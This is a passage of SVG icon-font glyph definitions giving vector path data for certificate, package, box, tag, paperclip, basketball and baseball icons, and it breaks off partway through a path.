<glyph unicode="&#xea4f;" glyph-name="document-certificate2" d="M672 161.616v0 0c19.795 20.201 32 47.867 32 78.384 0 61.856-50.144 112-112 112s-112-50.144-112-112c0-30.517 12.205-58.183 32-78.384v-65.616h-256.082c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-544.082c0-35.408-28.617-63.918-63.918-63.918h-64.082v65.616zM544 138.778v-157.977l48 47.999 48-47.999v157.977c-14.548-6.911-30.822-10.778-48-10.778s-33.452 3.867-48 10.778v0 0zM608 960v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM288 736v-32h224v32h-224zM288 832v-32h224v32h-224zM288 640v-32h416v32h-416zM288 544v-32h416v32h-416zM288 448v-32h416v32h-416zM592 160c44.183 0 80 35.817 80 80s-35.817 80-80 80c-44.183 0-80-35.817-80-80s35.817-80 80-80v0z" />
<glyph unicode="&#xea50;" glyph-name="certificate" d="M416 321.616v-65.616h415.921c17.717 0 32.079 14.365 32.079 32.239v415.521c0 17.805-14.063 32.239-32.079 32.239h-639.842c-17.717 0-32.079-14.365-32.079-32.239v-415.521c0-17.805 14.063-32.239 32.079-32.239h63.921v65.616c-19.795 20.201-32 47.867-32 78.384 0 61.856 50.144 112 112 112s112-50.144 112-112c0-30.517-12.205-58.183-32-78.384v0 0zM288 298.778v-125.977l48 47.999 48-47.999v125.977c-14.548-6.911-30.822-10.778-48-10.778s-33.452 3.867-48 10.778v0 0zM256 224h-63.842c-35.453 0-64.158 28.655-64.158 64.003v415.993c0 35.522 28.725 64.003 64.158 64.003h639.683c35.453 0 64.158-28.655 64.158-64.003v-415.993c0-35.522-28.725-64.003-64.158-64.003h-415.842v-128l-80 80-80-80v128zM224 608v-32h576v32h-576zM512 512v-32h288v32h-288zM608 416v-32h192v32h-192zM336 320c44.183 0 80 35.817 80 80s-35.817 80-80 80c-44.183 0-80-35.817-80-80s35.817-80 80-80v0z" />
<glyph unicode="&#xea51;" glyph-name="certificate2" d="M416 321.616v0 0c19.795 20.201 32 47.867 32 78.384 0 61.856-50.144 112-112 112s-112-50.144-112-112c0-30.517 12.205-58.183 32-78.384v-97.616h-63.842c-35.453 0-64.158 28.655-64.158 64.003v415.993c0 35.522 28.725 64.003 64.158 64.003h639.683c35.453 0 64.158-28.655 64.158-64.003v-415.993c0-35.522-28.725-64.003-64.158-64.003h-415.842v97.616zM288 298.778v-157.977l48 47.999 48-47.999v157.977c-14.548-6.911-30.822-10.778-48-10.778s-33.452 3.867-48 10.778v0 0zM224 608v-32h576v32h-576zM512 512v-32h288v32h-288zM608 416v-32h192v32h-192zM336 320c44.183 0 80 35.817 80 80s-35.817 80-80 80c-44.183 0-80-35.817-80-80s35.817-80 80-80v0z" />
<glyph unicode="&#xea52;" glyph-name="package" d="M608 544v-224h-160v224h-288v-448h736v448h-288zM480 800h-172.801l-140-224h280.801l32 224zM576 800l32-224h280.801l-140 224h-172.801zM128 560v16l160 256h480l160-256v-512h-800v496zM512 800l-32-224h96l-32 224h-32zM480 544v-192h96v192h-96zM192 288v-32h224v32h-224zM192 160v-32h224v32h-224zM192 224v-32h160v32h-160z" />
<glyph unicode="&#xea53;" glyph-name="package2" d="M128 544h320v-224h160v224h320v-480h-800v480zM448 576h-320l160 256h192l-32-256zM608 576h320l-160 256h-192l32-256zM480 576h96l-32 256h-32l-32-256zM480 544v-192h96v192h-96zM192 288v-32h224v32h-224zM192 160v-32h224v32h-224zM192 224v-32h160v32h-160z" />
<glyph unicode="&#xea54;" glyph-name="box" d="M96 560v16l160 256h480l160-256v-512h-800v496zM135.199 576h721.602l-140 224h-441.602l-140-224zM128 544v-448h736v448h-736zM415.917 384h160.167c35.249 0 63.917-28.654 63.917-64 0-35.593-28.616-64-63.917-64h-160.167c-35.249 0-63.917 28.654-63.917 64 0 35.593 28.616 64 63.917 64zM416.094 352c-17.725 0-32.094-14.204-32.094-32 0-17.673 14.012-32 32.094-32h159.813c17.725 0 32.094 14.204 32.094 32 0 17.673-14.012 32-32.094 32h-159.813z" />
<glyph unicode="&#xea55;" glyph-name="box2" d="M96 576l160 256h480l160-256v-512h-800v512zM856.801 576l-140 224h-441.602l-140-224h721.602zM415.917 384c-35.3 0-63.917-28.407-63.917-64 0-35.346 28.667-64 63.917-64h160.167c35.3 0 63.917 28.407 63.917 64 0 35.346-28.667 64-63.917 64h-160.167z" />
<glyph unicode="&#xea56;" glyph-name="box-filled" d="M96 576l160 256h480l160-256v-512h-800v512zM856.801 576l-140 224h-441.602l-140-224h721.602zM128 544v-448h736v448h-736zM415.917 384h160.167c35.249 0 63.917-28.654 63.917-64 0-35.593-28.616-64-63.917-64h-160.167c-35.249 0-63.917 28.654-63.917 64 0 35.593 28.616 64 63.917 64zM416.094 352c-17.725 0-32.094-14.204-32.094-32 0-17.673 14.012-32 32.094-32h159.813c17.725 0 32.094 14.204 32.094 32 0 17.673-14.012 32-32.094 32h-159.813zM320 768l-19.199-32h390.398l-19.199 32h-352zM278.398 704l-19.199-32h473.602l-19.199 32h-435.203zM240 640l-19.199-32h550.398l-19.199 32h-512z" />
<glyph unicode="&#xea57;" glyph-name="box-filled2" d="M96 576l160 256h480l160-256v-512h-800v512zM856.801 576l-140 224h-441.602l-140-224h721.602zM415.917 384c-35.3 0-63.917-28.407-63.917-64 0-35.346 28.667-64 63.917-64h160.167c35.3 0 63.917 28.407 63.917 64 0 35.346-28.667 64-63.917 64h-160.167zM320 768l-19.199-32h390.398l-19.199 32h-352zM278.398 704l-19.199-32h473.602l-19.199 32h-435.203zM240 640l-19.199-32h550.398l-19.199 32h-512z" />
<glyph unicode="&#xea58;" glyph-name="box3" d="M96 624v16l160 256h480l160-256v-640h-800v624zM135.199 640h721.602l-140 224h-441.602l-140-224zM128 480v-448h736v448h-736zM415.917 320h160.167c35.249 0 63.917-28.654 63.917-64 0-35.593-28.616-64-63.917-64h-160.167c-35.249 0-63.917 28.654-63.917 64 0 35.593 28.616 64 63.917 64zM416.094 288c-17.725 0-32.094-14.204-32.094-32 0-17.673 14.012-32 32.094-32h159.813c17.725 0 32.094 14.204 32.094 32 0 17.673-14.012 32-32.094 32h-159.813zM128 608v-96h736v96h-736z" />
<glyph unicode="&#xea59;" glyph-name="box4" d="M896 608v-96h-800v96h800zM96 480h800v-480h-800v480zM256 896l-160-256h800l-160 256h-480zM415.917 320c-35.3 0-63.917-28.407-63.917-64 0-35.346 28.667-64 63.917-64h160.167c35.3 0 63.917 28.407 63.917 64 0 35.346-28.667 64-63.917 64h-160.167z" />
<glyph unicode="&#xea5a;" glyph-name="box5" d="M128 544h-64v256h864v-256h-64v-480h-736v480zM160 544v-448h672v448h-672zM96 768v-192h800v192h-800zM415.917 384h160.167c35.249 0 63.917-28.654 63.917-64 0-35.593-28.616-64-63.917-64h-160.167c-35.249 0-63.917 28.654-63.917 64 0 35.593 28.616 64 63.917 64zM416.094 352c-17.725 0-32.094-14.204-32.094-32 0-17.673 14.012-32 32.094-32h159.813c17.725 0 32.094 14.204 32.094 32 0 17.673-14.012 32-32.094 32h-159.813z" />
<glyph unicode="&#xea5b;" glyph-name="box6" d="M864 544v-480h-736v480h736zM928 576v224h-864v-224h864zM415.917 384c-35.3 0-63.917-28.407-63.917-64 0-35.346 28.667-64 63.917-64h160.167c35.3 0 63.917 28.407 63.917 64 0 35.346-28.667 64-63.917 64h-160.167z" />
<glyph unicode="&#xea5c;" glyph-name="box-bookmark" d="M736 512h96v-448h-672v448h384v-288l96 96 96-96v288zM128 512v-480h736v480h64v256h-864v-256h64zM96 736h800v-192h-800v192zM576 512h128v-211.199l-64 64-64-64v211.199z" />
<glyph unicode="&#xea5d;" glyph-name="box-bookmark2" d="M864 512v-480h-736v480h416v-288l96 96 96-96v288h128zM928 544v224h-864v-224h864zM576 512v-211.199l64 64 64-64v211.199h-128z" />
<glyph unicode="&#xea5e;" glyph-name="tag-cord" d="M344.358 768h167.642l428.189-428.189c25.061-25.061 25.188-65.634 0.241-90.58l-229.661-229.661c-24.909-24.909-65.501-24.838-90.58 0.241l-428.189 428.189v256.012c0 30.403 20.906 55.557 49.030 62.244 5.25-8.488 9.573-18.589 12.585-30.365-16.58-1.366-29.615-15.4-29.615-32.161v-239.73l419.195-421.477c12.433-12.5 32.592-12.485 44.942-0.051l229.235 230.8c12.388 12.473 12.327 32.604-0.188 45.015l-421.184 417.713h-144.284c-0.756 3.654-1.518 7.416-2.286 11.287-1.421 7.163-3.119 14.067-5.072 20.713v0 0zM367.383 671.998c0.205 0.002 0.411 0.002 0.617 0.002 44.183 0 80-35.817 80-80s-35.817-80-80-80c-44.183 0-80 35.817-80 80 0 5.141 0.485 10.169 1.412 15.040 18.494-40.85 41.635-58.921 76.112-63.214 0.187-0.023 0.378 0.049 0.574 0.211 0.631-0.025 1.266-0.037 1.903-0.037 26.51 0 48 21.49 48 48 0 21.932-14.709 40.428-34.8 46.162 0.005 0.236-0.002 0.371-0.021 0.399-4.143 6.021-8.759 16.918-13.795 33.436v0 0zM318.042 741.059c-27.732 139.765-177.767 159.439-235.588 67.456-46.365-73.758-0.49-200.515 77.546-200.515v32c-49.66 0-84.743 96.937-50.454 151.485 42.963 68.348 155.226 53.627 177.108-56.654 25.885-130.459 45.408-158.831 97.346-158.831v32c-31.781 0-42.708 15.88-65.958 133.059v0z" />
<glyph unicode="&#xea5f;" glyph-name="tag-cord2" d="M344.477 767.229h167.642l428.189-428.189c25.061-25.061 25.188-65.634 0.241-90.58l-229.661-229.661c-24.909-24.909-65.501-24.838-90.58 0.241l-428.189 428.189v256.012c0 30.403 20.906 55.557 49.030 62.244 6.303-10.19 11.27-22.706 14.235-37.652 25.904-130.553 51.765-177.494 110.258-184.777 0.187-0.023 0.378 0.049 0.574 0.211 0.631-0.025 1.266-0.037 1.903-0.037 26.51 0 48 21.49 48 48 0 21.932-14.709 40.428-34.8 46.162 0.005 0.236-0.002 0.371-0.021 0.399-8.672 12.603-19.416 46.569-31.749 108.725-1.421 7.163-3.119 14.067-5.072 20.713v0 0zM318.161 740.288c-27.732 139.765-177.767 159.439-235.588 67.456-46.365-73.758-0.49-200.515 77.546-200.515v32c-49.66 0-84.743 96.937-50.454 151.485 42.963 68.348 155.226 53.627 177.108-56.654 25.885-130.459 45.408-158.831 97.346-158.831v32c-31.781 0-42.708 15.88-65.958 133.059v0z" />
<glyph unicode="&#xea60;" glyph-name="tag2" d="M448 832l428.189-428.189c25.061-25.061 25.188-65.634 0.241-90.58l-229.661-229.661c-24.909-24.909-65.501-24.838-90.58 0.241l-428.189 428.189v256.012c0 35.59 28.648 63.988 63.988 63.988h256.012zM432 800h-239.73c-17.822 0-32.27-14.624-32.27-32.27v-239.73l419.195-421.477c12.433-12.5 32.592-12.485 44.942-0.051l229.235 230.8c12.388 12.473 12.327 32.604-0.188 45.015l-421.184 417.713zM304 576v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM304 608c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xea61;" glyph-name="tag3" d="M448 832l428.189-428.189c25.061-25.061 25.188-65.634 0.241-90.58l-229.661-229.661c-24.909-24.909-65.501-24.838-90.58 0.241l-428.189 428.189v256.012c0 35.59 28.648 63.988 63.988 63.988h256.012zM304 608c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xea62;" glyph-name="tags" d="M200.493 800v0 0c11.047 19.192 31.762 32 55.495 32h256.012l428.189-428.189c25.061-25.061 25.188-65.634 0.241-90.58l-229.661-229.661c-20.273-20.273-50.933-23.999-75.164-11.164l-20.836-20.836c-24.909-24.909-65.501-24.838-90.58 0.241l-428.189 428.189v256.012c0 35.59 28.648 63.988 63.988 63.988h40.505zM192 768h-31.73c-17.822 0-32.27-14.624-32.27-32.27v-239.73l419.195-421.477c12.433-12.5 32.592-12.485 44.942-0.051l18.632 18.759-418.769 418.769v256zM496 800h-239.73c-17.822 0-32.27-14.624-32.27-32.27v-239.73l419.195-421.477c12.433-12.5 32.592-12.485 44.942-0.051l229.235 230.8c12.388 12.473 12.327 32.604-0.188 45.015l-421.184 417.713zM368 576v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM368 608c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xea63;" glyph-name="tags2" d="M159.988 800c-35.339 0-63.988-28.398-63.988-63.988v-256.012l428.189-428.189c22.925-22.925 58.812-24.954 83.834-6.107l-448.022 450.296v303.783c0 0.072 0 0.145 0.001 0.217h-0.013zM512 832l428.189-428.189c25.061-25.061 25.188-65.634 0.241-90.58l-229.661-229.661c-24.909-24.909-65.501-24.838-90.58 0.241l-428.189 428.189v256.012c0 35.59 28.648 63.988 63.988 63.988h256.012zM368 608c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xea64;" glyph-name="tag-add" d="M288 288v96h32v-96h96v-32h-96v-96h-32v96h-96v32h96zM215.712 424.288v0 0c-52.448-30.472-87.712-87.262-87.712-152.288 0-97.202 78.798-176 176-176 65.026 0 121.816 35.265 152.288 87.712l99.901-99.901c25.080-25.080 65.671-25.151 90.58-0.241l229.661 229.661c24.946 24.946 24.819 65.519-0.241 90.58l-428.189 428.189h-256.012c-35.339 0-63.988-28.398-63.988-63.988v-256.012l87.712-87.712zM248.461 439.058l-88.461 88.942v239.73c0 17.646 14.448 32.27 32.27 32.27h239.73l421.184-417.713c12.515-12.412 12.576-32.543 0.188-45.015l-229.235-230.8c-12.35-12.434-32.509-12.45-44.942 0.051l-108.442 109.032c5.996 17.718 9.246 36.702 9.246 56.445 0 97.202-78.798 176-176 176-19.407 0-38.080-3.141-55.539-8.942v0 0zM304 576v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM304 608c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM304 128v0c-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144s-64.471-144-144-144z" />
<glyph unicode="&#xea65;" glyph-name="tag-add2" d="M288 288v96h32v-96h96v-32h-96v-96h-32v96h-96v32h96zM192.426 447.574l-64.426 64.426v256.012c0 35.59 28.648 63.988 63.988 63.988h256.012l428.189-428.189c25.061-25.061 25.188-65.634 0.241-90.58l-229.661-229.661c-24.909-24.909-65.501-24.838-90.58 0.241l-76.615 76.615c20.531 32.241 32.426 70.518 32.426 111.574 0 114.875-93.125 208-208 208-41.056 0-79.333-11.895-111.574-32.426v0 0zM304 608c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM304 96c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0z" />
<glyph unicode="&#xea66;" glyph-name="tag-remove" d="M215.712 424.288v0 0c-52.448-30.472-87.712-87.262-87.712-152.288 0-97.202 78.798-176 176-176 65.026 0 121.816 35.265 152.288 87.712l99.901-99.901c25.080-25.080 65.671-25.151 90.58-0.241l229.661 229.661c24.946 24.946 24.819 65.519-0.241 90.58l-428.189 428.189h-256.012c-35.339 0-63.988-28.398-63.988-63.988v-256.012l87.712-87.712zM248.461 439.058l-88.461 88.942v239.73c0 17.646 14.448 32.27 32.27 32.27h239.73l421.184-417.713c12.515-12.412 12.576-32.543 0.188-45.015l-229.235-230.8c-12.35-12.434-32.509-12.45-44.942 0.051l-108.442 109.032c5.996 17.718 9.246 36.702 9.246 56.445 0 97.202-78.798 176-176 176-19.407 0-38.080-3.141-55.539-8.942v0 0zM304 576v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM304 608c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM304 128v0c-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144s-64.471-144-144-144zM192 288v-32h224v32h-224z" />
<glyph unicode="&#xea67;" glyph-name="tag-remove2" d="M192.426 447.574l-64.426 64.426v256.012c0 35.59 28.648 63.988 63.988 63.988h256.012l428.189-428.189c25.061-25.061 25.188-65.634 0.241-90.58l-229.661-229.661c-24.909-24.909-65.501-24.838-90.58 0.241l-76.615 76.615c20.531 32.241 32.426 70.518 32.426 111.574 0 114.875-93.125 208-208 208-41.056 0-79.333-11.895-111.574-32.426v0 0zM304 608c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM304 96v0c-97.202 0-176 78.798-176 176s78.798 176 176 176c97.202 0 176-78.798 176-176s-78.798-176-176-176zM192 288v-32h224v32h-224z" />
<glyph unicode="&#xea68;" glyph-name="tag-checked" d="M215.712 424.288v0 0c-52.448-30.472-87.712-87.262-87.712-152.288 0-97.202 78.798-176 176-176 65.026 0 121.816 35.265 152.288 87.712l99.901-99.901c25.080-25.080 65.671-25.151 90.58-0.241l229.661 229.661c24.946 24.946 24.819 65.519-0.241 90.58l-428.189 428.189h-256.012c-35.339 0-63.988-28.398-63.988-63.988v-256.012l87.712-87.712zM248.461 439.058l-88.461 88.942v239.73c0 17.646 14.448 32.27 32.27 32.27h239.73l421.184-417.713c12.515-12.412 12.576-32.543 0.188-45.015l-229.235-230.8c-12.35-12.434-32.509-12.45-44.942 0.051l-108.442 109.032c5.996 17.718 9.246 36.702 9.246 56.445 0 97.202-78.798 176-176 176-19.407 0-38.080-3.141-55.539-8.942v0 0zM304 576v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM304 608c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM304 128v0c-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144s-64.471-144-144-144zM288 184.235l-75.314 75.314 23.431 23.431 51.882-51.882 99.882 99.882 23.431-23.431-123.314-123.314z" />
<glyph unicode="&#xea69;" glyph-name="tag-checked2" d="M192.426 447.574l-64.426 64.426v256.012c0 35.59 28.648 63.988 63.988 63.988h256.012l428.189-428.189c25.061-25.061 25.188-65.634 0.241-90.58l-229.661-229.661c-24.909-24.909-65.501-24.838-90.58 0.241l-76.615 76.615c20.531 32.241 32.426 70.518 32.426 111.574 0 114.875-93.125 208-208 208-41.056 0-79.333-11.895-111.574-32.426v0 0zM304 608c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM304 96c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0zM288 184.235l-75.314 75.314 23.431 23.431 51.882-51.882 99.882 99.882 23.431-23.431-123.314-123.314z" />
<glyph unicode="&#xea6a;" glyph-name="tag-cancel" d="M304 249.373l-67.882-67.882-22.627 22.627 67.882 67.882-67.882 67.882 22.627 22.627 67.882-67.882 67.882 67.882 22.627-22.627-67.882-67.882 67.882-67.882-22.627-22.627-67.882 67.882zM215.712 424.288v0 0c-52.448-30.472-87.712-87.262-87.712-152.288 0-97.202 78.798-176 176-176 65.026 0 121.816 35.265 152.288 87.712l99.901-99.901c25.080-25.080 65.671-25.151 90.58-0.241l229.661 229.661c24.946 24.946 24.819 65.519-0.241 90.58l-428.189 428.189h-256.012c-35.339 0-63.988-28.398-63.988-63.988v-256.012l87.712-87.712zM248.461 439.058l-88.461 88.942v239.73c0 17.646 14.448 32.27 32.27 32.27h239.73l421.184-417.713c12.515-12.412 12.576-32.543 0.188-45.015l-229.235-230.8c-12.35-12.434-32.509-12.45-44.942 0.051l-108.442 109.032c5.996 17.718 9.246 36.702 9.246 56.445 0 97.202-78.798 176-176 176-19.407 0-38.080-3.141-55.539-8.942v0 0zM304 576v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM304 608c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM304 128v0c-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144s-64.471-144-144-144z" />
<glyph unicode="&#xea6b;" glyph-name="tag-cancel2" d="M304 249.373l-67.882-67.882-22.627 22.627 67.882 67.882-67.882 67.882 22.627 22.627 67.882-67.882 67.882 67.882 22.627-22.627-67.882-67.882 67.882-67.882-22.627-22.627-67.882 67.882zM192.426 447.574l-64.426 64.426v256.012c0 35.59 28.648 63.988 63.988 63.988h256.012l428.189-428.189c25.061-25.061 25.188-65.634 0.241-90.58l-229.661-229.661c-24.909-24.909-65.501-24.838-90.58 0.241l-76.615 76.615c20.531 32.241 32.426 70.518 32.426 111.574 0 114.875-93.125 208-208 208-41.056 0-79.333-11.895-111.574-32.426v0 0zM304 608c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM304 96c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0z" />
<glyph unicode="&#xea6c;" glyph-name="paperclip2" d="M704.333 443.314l-271.615-271.615c-49.94-49.94-131.048-49.799-180.933 0.086v0c-49.987 49.987-50.105 130.914 0.142 181.162l373.093 373.093c31.307 31.307 81.795 31.577 113.254 0.117v0c31.242-31.242 31.268-81.869 0.168-112.969l-373.706-373.706c-12.394-12.394-32.485-12.398-45.069 0.185v0c-12.497 12.497-12.502 32.753-0.034 45.221l271.563 271.563-22.627 22.627-271.396-271.396c-25.067-25.067-25.3-65.474-0.133-90.642v0c24.994-24.994 65.386-25.124 90.31-0.2l373.595 373.595c43.715 43.715 43.607 114.7-0.043 158.349v0c-43.739 43.739-114.582 43.81-158.448-0.056l-373.318-373.318c-62.472-62.472-62.335-163.896 0.022-226.252v0c62.484-62.484 163.821-62.453 226.469 0.195l271.334 271.334-22.627 22.627z" />
<glyph unicode="&#xea6d;" glyph-name="paperclip3" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM659.078 398.059l-158.338-158.338c-50.017-50.017-131.188-49.939-181.073-0.054-49.987 49.987-50.071 130.949 0.164 181.183l237.234 237.234c31.347 31.347 81.868 31.65 113.327 0.19 31.242-31.242 31.18-81.957-0.066-113.203l-237.367-237.367c-12.582-12.582-32.826-12.739-45.41-0.155-12.497 12.497-12.376 32.878-0.067 45.188l158.459 158.459-22.627 22.627-158.451-158.451c-24.961-24.961-25.109-65.283 0.059-90.451 24.994-24.994 65.495-25.014 90.375-0.134l237.915 237.915c43.632 43.632 43.457 114.55-0.192 158.2-43.739 43.739-114.744 43.648-158.551-0.159l-237.609-237.609c-62.384-62.384-62.176-163.737 0.18-226.094 62.484-62.484 163.573-62.701 226.324 0.049l158.342 158.342-22.627 22.627z" />
<glyph unicode="&#xea6e;" glyph-name="basketball" d="M544 799.658c89.925-3.847 171.491-39.965 233.411-97.068v0c-62.091-67.562-101.24-156.543-105.097-254.591h-128.314v351.658zM512 799.658v-351.658h-128.314c-3.857 98.048-43.006 187.029-105.097 254.591v0c61.92 57.103 143.486 93.221 233.411 97.068zM544 64.342v351.658h128.314c3.857-98.048 43.006-187.029 105.097-254.591v0c-61.92-57.103-143.486-93.221-233.411-97.068zM512 64.342c-89.925 3.847-171.491 39.965-233.411 97.068 62.091 67.562 101.24 156.543 105.097 254.591h128.314v-351.658zM800 679.875c56.287-61.73 91.843-142.692 95.658-231.875v0h-191.317c3.815 89.183 39.371 170.144 95.658 231.875v0 0zM800 184.125v0 0c-56.287 61.73-91.843 142.692-95.658 231.875h191.317c-3.815-89.183-39.371-170.144-95.658-231.875zM160.342 448c3.815 89.183 39.371 170.144 95.658 231.875v0c56.287-61.73 91.843-142.692 95.658-231.875h-191.317zM160.342 416h191.317c-3.815-89.183-39.371-170.144-95.658-231.875-56.287 61.73-91.843 142.692-95.658 231.875zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400v0z" />
<glyph unicode="&#xea6f;" glyph-name="basketball2" d="M511.686 32.628v383.686h-128.314c-4.306-109.458-52.596-207.615-127.686-277.287 67.732-62.845 157.269-102.515 256-106.399v0zM211.218 187.644c-49.322 63.702-79.836 142.7-83.218 228.67h223.344c-4.303-100.588-48.984-190.717-118.247-254.591 0.433-0.471-14.558 16.465-21.879 25.921v0zM822.274 161.723c62.091 67.562 101.24 156.543 105.097 254.591v0h-223.344c4.303-100.588 48.984-190.717 118.247-254.591v0 0zM799.686 139.027c-67.732-62.845-157.269-102.515-256-106.399v0 383.686h128.314c4.306-109.458 52.596-207.615 127.686-277.287v0 0zM822.274 702.905c62.091-67.562 101.24-156.543 105.097-254.591v0h-223.344c4.303 100.588 48.984 190.717 118.247 254.591v0 0zM799.686 725.601c-67.732 62.845-157.269 102.515-256 106.399v-383.686h128.314c4.306 109.458 52.596 207.615 127.686 277.287v0zM233.097 702.905c-62.091-67.562-101.24-156.543-105.097-254.591v0h223.344c-4.303 100.588-48.984 190.717-118.247 254.591v0zM255.686 725.601c67.732 62.845 157.269 102.515 256 106.399v0-383.686h-128.314c-4.306 109.458-52.596 207.615-127.686 277.287v0z" />
<glyph unicode="&#xea70;" glyph-name="baseball" d="M278.589 161.409v0c8.768 9.541 17.079 19.509 24.898 29.87l23.542-17.104 18.809 25.889-24.105 17.514c15.885 24.968 29.077 51.816 39.168 80.136l29.764-9.671 9.889 30.434-30.136 9.792c7.536 28.141 12.079 57.506 13.268 87.733h32.314v32h-32.314c-1.189 30.227-5.732 59.592-13.268 87.733l30.136 9.792-9.889 30.434-29.764-9.671c-10.091 28.32-23.283 55.168-39.168 80.136l24.105 17.514-18.809 25.889-23.542-17.104c-7.819 10.36-16.129 20.329-24.898 29.87 65.573 60.471 153.179 97.409 249.411 97.409s183.838-36.938 249.411-97.409c-8.768-9.541-17.079-19.509-24.898-29.87l-23.542 17.104-18.809-25.889 24.105-17.514c-15.885-24.968-29.077-51.816-39.168-80.136l-29.764 9.671-9.889-30.434 30.136-9.792c-7.536-28.141-12.079-57.506-13.268-87.733h-32.314v-32h32.314c1.189-30.227 5.732-59.592 13.268-87.733l-30.136-9.792 9.889-30.434 29.764 9.671c10.091-28.32 23.283-55.168 39.168-80.136l-24.105-17.514 18.809-25.889 23.542 17.104c7.819-10.36 16.129-20.329 24.898-29.87v0c-65.573-60.471-153.179-97.409-249.411-97.409s-183.838 36.938-249.411 97.409zM256 184.125c-59.635 65.402-96 152.392-96 247.875s36.365 182.472 96 247.875c7.582-8.316 14.789-16.98 21.592-25.967l-28.229-20.509 18.809-25.889 27.615 20.063c13.979-22.238 25.644-46.078 34.659-71.181l-31.082-10.099 9.889-30.434 30.679 9.968c6.573-25.002 10.582-51.044 11.727-77.827h-31.658v-32h31.658c-1.146-26.783-5.154-52.825-11.727-77.827v0l-30.679 9.968-9.889-30.434 31.082-10.099c-9.015-25.103-20.68-48.942-34.659-71.181l-27.615 20.063-18.809-25.889 28.229-20.509c-6.803-8.987-14.009-17.651-21.592-25.967v0zM800 184.125v0 0c-7.582 8.316-14.789 16.98-21.592 25.967l28.229 20.509-18.809 25.889-27.615-20.063c-13.979 22.238-25.644 46.078-34.659 71.181l31.082 10.099-9.889 30.434-30.679-9.968c-6.573 25.002-10.582 51.044-11.727 77.827h31.658v32h-31.658c1.146 26.783 5.154 52.825 11.727 77.827l30.679-9.968 9.889 30.434-31.082 10.099c9.015 25.103 20.68 48.942 34.659 71.181l27.615-20.063 18.809 25.889-28.229 20.509c6.803 8.987 14.009 17.651 21.592 25.967 59.635-65.402 96-152.392 96-247.875s-36.365-182.472-96-247.875zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400v0z" />
<glyph unicode="&#xea71;" glyph-name="baseball2" d="M800 138.713c-71.373-66.223-166.958-106.713-272-106.713s-200.627 40.489-272 106.713v0 0c17.326 16.076 33.225 33.668 47.486 52.566l23.542-17.104 18.809 25.889-24.105 17.514c15.885 24.968 29.077 51.816 39.168 80.136l29.764-9.671 9.889 30.434-30.136 9.792c7.536 28.141 12.079 57.506 13.268 87.733h32.314v32h-32.314c-1.189 30.227-5.732 59.592-13.268 87.733l30.136 9.792-9.889 30.434-29.764-9.671c-10.091 28.32-23.283 55.168-39.168 80.136l24.105 17.514-18.809 25.889-23.542-17.104c-14.261 18.898-30.16 36.49-47.486 52.566v0c71.373 66.223 166.958 106.713 272 106.713s200.627-40.489 272-106.713v0c-17.326-16.076-33.225-33.668-47.486-52.566l-23.542 17.104-18.809-25.889 24.105-17.514c-15.885-24.968-29.077-51.816-39.168-80.136l-29.764 9.671-9.889-30.434 30.136-9.792c-7.536-28.141-12.079-57.506-13.268-87.733h-32.314v-32h32.314c1.189-30.227 5.732-59.592 13.268-87.733v0l-30.136-9.792 9.889-30.434 29.764 9.671c10.091-28.32 23.283-55.168 39.168-80.136l-24.105-17.514 18.809-25.889 23.542 17.104c14.261-18.898 30.16-36.49 47.486-52.566v0 0 0zM840.56 182.365c54.72 68.424 87.44 155.209 87.44 249.635 0 104.352-39.959 199.371-105.411 